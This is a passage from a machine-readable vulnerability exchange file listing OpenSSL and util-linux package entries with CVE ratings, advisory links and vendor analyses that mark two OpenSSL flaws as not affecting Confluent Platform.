          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28387",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages.  These SMTP (or other similar) clients are not vulnerable\nto this issue.  Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28387"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28387"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28388",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing is enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28388"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28388"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
